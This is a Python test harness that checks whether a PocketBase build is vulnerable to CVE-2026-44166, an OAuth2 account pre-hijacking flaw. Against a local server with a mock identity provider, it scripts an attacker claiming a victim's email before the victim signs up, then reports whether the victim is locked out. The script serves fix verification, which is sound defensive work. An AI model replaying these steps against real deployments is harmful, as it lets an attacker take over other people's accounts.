"""verify_fix.py -- fix-verification harness for CVE-2026-44166. Runs the same pre-hijacking scenario against any PocketBase build and reports the outcome (attacker locked the victim out, or the victim's login evicted the attacker). Usage: python verify_fix.py 0.37.4 # patched -> attacker evicted python verify_fix.py 0.37.3 # vulnerable -> victim locked out For the verbatim exploit as originally reported, see poc.py. """ import subprocess, time, shutil, os, json, sys import urllib.request, urllib.error import mock_oauth2_server VER = sys.argv[1] if len(sys.argv) > 1 else "0.37.4" mock_oauth2_server.start() time.sleep(0.3) PB_EXE = "pocketbase.exe" if os.name == "nt" else "pocketbase" PB_BIN = os.path.join(os.path.dirname(__file__), f"bin_{VER}", PB_EXE) PB_DATA = os.path.join(os.path.dirname(__file__), f"pb_data_{VER}") if os.path.exists(PB_DATA): shutil.rmtree(PB_DATA) subprocess.run([PB_BIN, "superuser", "upsert", "admin@poc.test", "Admin1234!", f"--dir={PB_DATA}"], check=True, capture_output=True) pb = subprocess.Popen([PB_BIN, "serve", "--http=127.0.0.1:8090", f"--dir={PB_DATA}", "--automigrate=false"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) time.sleep(3) def api(method, path, body=None, token=None, soft=False): req = urllib.request.Request("http://127.0.0.1:8090" + path, json.dumps(body).encode() if body else None, {"Content-Type": "application/json", **({"Authorization": f"Bearer {token}"} if token else {})}, method=method) try: with urllib.request.urlopen(req) as r: return json.loads(r.read()) except urllib.error.HTTPError as e: b = e.read().decode() if soft: return {"_err": e.code, "_body": b} raise RuntimeError(f"HTTP {e.code}: {b}") print(f"=== Testing PocketBase {VER} ===") try: admin_tok = api("POST", "/api/collections/_superusers/auth-with-password", {"identity": "admin@poc.test", "password": "Admin1234!"})["token"] api("POST", "/api/collections", { "name": "members", "type": "auth", "createRule": "", "oauth2": {"enabled": True, "providers": [{ "name": "oidc", "clientId": "x", "clientSecret": "x", "authURL": "http://127.0.0.1:8089/authorize", "tokenURL": "http://127.0.0.1:8089/token", "userInfoURL": "http://127.0.0.1:8089/userinfo", "pkce": False}]} }, admin_tok) r1 = api("POST", "/api/collections/members/auth-with-oauth2", { "provider": "oidc", "code": "attacker_code", "redirectURL": "http://localhost", "createData": {"email": "victim@company.com"}}) print(f"[1] Attacker pre-claims: email={r1['record']['email']} verified={r1['record']['verified']} id={r1['record']['id']}") r2 = api("POST", "/api/collections/members/auth-with-oauth2", { "provider": "oidc", "code": "victim_code", "redirectURL": "http://localhost"}, soft=True) if "_err" in r2: print(f"[2] Victim login: HTTP {r2['_err']} -- {json.loads(r2['_body']).get('message')} => LOCKED OUT") victim_id = None else: victim_id = r2['record']['id'] print(f"[2] Victim login: SUCCESS verified={r2['record']['verified']} id={victim_id} => victim owns the account") r3 = api("POST", "/api/collections/members/auth-with-oauth2", { "provider": "oidc", "code": "attacker_code", "redirectURL": "http://localhost"}, soft=True) if "_err" in r3: print(f"[3] Attacker re-auth: HTTP {r3['_err']} -- {json.loads(r3['_body']).get('message')} => attacker evicted") else: same = (victim_id is not None and r3['record']['id'] == victim_id) print(f"[3] Attacker re-auth: email={r3['record']['email']} id={r3['record']['id']} same-as-victim={same}") finally: pb.terminate()